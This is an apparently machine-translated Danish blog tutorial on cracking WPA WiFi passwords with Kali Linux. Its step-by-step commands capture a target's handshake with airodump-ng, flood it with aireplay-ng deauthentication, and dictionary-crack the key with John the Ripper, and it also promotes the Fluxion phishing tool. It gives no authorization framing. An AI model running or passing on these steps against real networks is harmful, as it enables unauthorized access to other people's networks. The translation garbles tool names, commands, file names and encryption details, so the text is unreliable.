Sådan Hackes Trådløst Internet Ved Hjælp Af Kali Linuk?

det mest stillede spørgsmål på Google er , hvordan man hacker trådløst internet ved hjælp af Kali Linuk , Hack trådløst internet , Hvordan man hacker trådløst internet ved hjælp af Kali Linuk osv. Men først forstå, hvad der er trådløst internet & dens kryptering.

indlæg indhold

Hvad er trådløst internet, og er det muligt at hacke det?

trådløst internet er navnet på en populær trådløs netværksteknologi, der bruger radiobølger til at levere trådløst højhastighedsinternet og netværksforbindelser. En almindelig misforståelse er, at udtrykket trådløst internet er en forkortelse for “trådløs troskab”, men dette er ikke tilfældet. Trådløst internet er simpelthen en varemærkebeskyttet sætning, der betyder IEEE 802.11

når vi taler om hacking af trådløst internet fra enhver enhed, betyder det, at sikkerheden ved det trådløse internet betyder mest. Så når vi prøver at hacke trådløst internet, er det meget let at knække eller hacke adgangskoden til det tilgængelige system. Det er en af de typer af kryptering, som bruges til at sikre det trådløse netværk, så lad starte med hurtig tutorial.

værktøjer, der bruges til at hacke trådløs adgangskode i Kali-Linuk

vi bruger hovedsageligt kali Linuk indbygget værktøjssæt til at hacke trådløs adgangskode, som er følgende:

  • airmon-ng
  • aireplay-ng
  • airodump-ng
  • hccap
  • john the ripper
  • aircrack-ng

Airmon-ng

dette script kan bruges for at aktivere skærmtilstand på trådløse grænseflader. Det kan også bruges til at gå tilbage fra skærmtilstand til administreret tilstand. Indtastning af airmon-ng-kommandoen uden parametre viser grænsefladestatus.

brug: airmon-ng < start / stop>< interface >eller airmon-ng< check|check kill >

Aireplay-ng

Aireplay-ng bruges til at injicere rammer.

den primære funktion er at generere trafik til senere brug i aircrack-ng til at knække VP-og app-PSK-tasterne. Der er forskellige angreb, der kan forårsage deauthentications med det formål at indfange APV-håndtryksdata, falske godkendelser, interaktiv pakkeafspilning, håndlavet ARP-anmodningsindsprøjtning og ARP-anmodningsindsprøjtning. Med packetforge-ng-værktøjet er det muligt at oprette vilkårlige rammer.

de fleste drivere skal lappes for at kunne injicere.

Airodump-ng

Airodump-ng bruges til pakkefangst af rå 802.11 rammer og er især velegnet til opsamling af VIP IV ‘ er (Initialiseringsvektor) med det formål at bruge dem med aircrack-ng. Hvis du har en GPS-modtager tilsluttet computeren, er airodump-ng i stand til at logge koordinaterne for de fundne adgangspunkter.

derudover airodump-ng skriver ud flere filer, der indeholder oplysninger om alle adgangspunkter og klienter set.

Hccap

at konvertere aircrack-ng capture hashes til .vi bruger denne kommando.

John the Ripper

for at knække adgangskoden bruger vi john the ripper i den sidste fase. vi bruger dette værktøj til at sammenligne hashes med adgangskodeordbogen. Der er mange andre måder, men vi vil prøve en af dem.

Aircrack-ng

Aircrack-ng er en komplet pakke af værktøjer til at vurdere trådløst netværk sikkerhed.

det fokuserer på forskellige områder af Trådløs sikkerhed:

  • overvågning: Pakkeoptagelse og eksport af data til tekstfiler til videre behandling af tredjepartsværktøjer
  • Attacking: Replay angreb, deautentisering, falske adgangspunkter og andre via pakkeinjektion
  • test: kontrol af trådløse kort og Driverfunktioner (capture and injection)
  • Cracking: VIP og APPA PSK (APPA 1 og 2)

skridt til at hacke trådløst internet ved hjælp af Kali-Linuk eller med et hvilket som helst andet Debian-LINUK OS.

alle kommandoer med beskrivelse er angivet ovenfor kontrollere, at hvis du fik noget problem.

Trin 1 :

Tag først dit netværkskort i skærmtilstand for at overvåge de omgivende netværk.

# airmon-ng start vlan1

1
2

#airodump-ng vlan1mon

3
4

Trin 2:

#airodump –ng-bssid 2C: 55: D3: B1: 35: 0C-c 1-V kalip300 vlan1mon

5
6

Trin 3:

#aireplay-ng -0 0 – a 2C: 55: D3: B1: 35:0C vlan1mon

7

når vi fange sucsessfully handshak fil ser vi noget som dette.

8

Trin 4:

#aircrack-ng kalip300-01.cap-J john

9

Trin 5:

#hccap2john john.hccap > APV

Trin 6:

#john –ordliste*/rod/Desktop/rockyou.e-mail: info (at)

og vi hacker med succes adgangskoden til trådløst internet af kali linuk

værktøj til Hacking af trådløst internet :-Fluksion

Fluksion er en sikkerhed revision og social-engineering forskningsværktøj. Det er en genindspilning af linset af vk496 med (forhåbentlig) færre fejl og mere funktionalitet. Scriptet forsøger at hente apa/apa2 nøglen fra et mål adgangspunkt ved hjælp af en social engineering (phishing) angreb. Det er kompatibelt med den seneste udgivelse af Kali (rolling). Opsætning af angreb er for det meste manuel, men eksperimentel auto-mode håndterer nogle af angrebenes opsætningsparametre. Læs ofte stillede spørgsmål, før du anmoder om problemer.

trådløs kryptering

VIP-kryptering

kablet ækvivalent privatliv (VIP) er en IEEE 802.11 trådløs protokol, der leverer sikkerhedsalgoritmer til datafortrolighed under trådløse transmissioner.

VIP bruger en 24-bit Initialiseringsvektor(IV) til at danne stream cipher RC4 for fortrolighed og CRC-32 checksum for intergrity af trådløs transmission.

Sådan fungerer det

  1. CRC-32 checksum bruges til at beregne en 32-bit Integritetskontrolværdi (ICV) for dataene, som igen føjes til datarammen.

2. Et 24-bit vilkårligt tal kendt som Initialiseringsvektor (IV) føjes til VP-tasten; VP-tasten og IV kaldes sammen som VP-frø.

3. VP-frøet bruges som input til RC4-algoritmen til at generere en nøglestrøm (nøglestrøm er Bitvis kåret med kombinationen af data og ICV for at producere de krypterede data).

4. IV-feltet (IV+PAD+KID) føjes til krypteringsteksten for at generere MAC-ramme

Sådan fungerer vi

APV-kryptering

trådløs beskyttet adgang (APV) er en datakrypteringsmetode for APV baseret på 802.11 standarder.

det er et øjebliksbillede af 802.11 i (under udvikling), der giver stærkere kryptering og muliggør PSK til EAP-godkendelse.

Sådan fungerer APV

tidsmæssig krypteringsnøgle, transmitteringsadresse og TKIP-sekvenstæller (TSC) bruges som input til RC4-algoritme til at generere keystram.

MAC Service Data Unit (MSDU) og message intergrity check (MIC) kombineres ved hjælp af Michael algoritme.

kombinationen af MSDU og MIC er fragmenteret til at generere MAC Protocol Data Unit (MPDU).

en 32-bit Integrity Check Value (ICV) beregnes for MPDU

kombinationen af MPDU og ICV er Bitvis vist med Keysteam for at producere de krypterede data

IV føjes til de krypterede data for at generere MAC-ramme.

apa 2-kryptering

apa 2 giver virksomheds-og trådløs bruger stærkere databeskyttelse og netværksadgangskontrol

giver sikkerhed i regeringen ved at implementere National Institute of Standards and Technology (NIST) FIPS 140-2 kompatibel AES-krypteringsalgoritme.

apa2 – Personal

apa2 – Personal bruger en opsætningsadgangskode (pre-shared Key) til at beskytte uautoriseret netværksadgang.

i PSK-tilstand krypterer hver trådløs netværksenhed netværkstrafikken ved hjælp af en 128-bit nøgle, der er afledt af en adgangskode på 8 til 63 ASCII-tegn.

apa2 – Enterprise

det inkluderer EAP eller RADIUS til centraliseret klientgodkendelse ved hjælp af flere godkendelsesmetoder, såsom token-kort, Kerberos, certifikater osv.

brugere tildeles loginoplysninger af en centraliseret server, som de skal præsentere, når de opretter forbindelse til netværket.

Sådan fungerer apa2

i CCMP-implementeringen af apa2 bruges Mac-headerdata til at opbygge additonal authentication data (AAD).

et sekventeret pakkenummer (PN) bruges til at opbygge nonce.

AAD, temporal key og nonce sammen med CCMP bruges til datakryptering.

en apa2 Mac-ramme er bygget ved hjælp af MAC header, CCMP header, krypterede data og krypteret mikrofon

 Sådan fungerer apa2

du kan gå glip af, hvordan du Hacker telefon

Write a Comment

Din e-mailadresse vil ikke blive publiceret.